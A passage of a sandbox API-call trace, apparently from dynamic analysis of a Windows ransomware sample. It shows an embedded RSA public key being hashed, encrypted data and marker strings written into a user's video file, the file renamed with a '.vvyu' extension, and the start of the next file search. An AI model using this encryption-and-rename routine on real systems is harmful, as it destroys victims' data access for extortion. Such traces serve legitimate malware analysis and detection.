KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.588] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.588] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.588] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0197.589] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.589] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.589] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.589] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.589] GetLastError () returned 0x0 [0197.589] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.589] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0197.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.589] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.589] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.589] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xdb60) returned 0x2d4f778 [0197.590] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d310 [0197.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3d8 [0197.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d358 [0197.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3f0 [0197.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a420 [0197.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a480 [0197.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a438 [0197.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.591] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a480 [0197.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0197.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a438 [0197.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a420 [0197.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0197.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bec8 [0197.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0197.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.594] GetCurrentThreadId () returned 0x264 [0197.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4bd30 [0197.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.594] GetCurrentThreadId () returned 0x264 [0197.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a480 [0197.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a420 [0197.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0197.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a438 [0197.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a408 [0197.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a498 [0197.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0197.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a468 [0197.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0197.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a450 [0197.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4b0 [0197.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a450 [0197.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a468 | out: hHeap=0x6a0000) returned 1 [0197.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0197.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0197.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a420 [0197.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0197.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0197.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0197.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0197.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0197.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0197.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0197.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0197.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0197.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0197.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0197.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d358 | out: hHeap=0x6a0000) returned 1 [0197.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0197.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0197.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.606] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0xdb54, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0xdb54, lpOverlapped=0x0) returned 1 [0197.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.608] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xdb59, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.608] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.609] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.610] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.610] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.610] CloseHandle (hObject=0x52c) returned 1 [0197.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe0) returned 0x6dc668 [0197.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8f0) returned 0x2d3a670 [0197.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc668 | out: hHeap=0x6a0000) returned 1 [0197.612] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\htWDnwTyY\\WdFQwzg9SEi1QiIC.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\htwdnwtyy\\wdfqwzg9sei1qiic.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\htWDnwTyY\\WdFQwzg9SEi1QiIC.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\htwdnwtyy\\wdfqwzg9sei1qiic.mkv.vvyu")) returned 1 [0197.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.614] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.617] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: 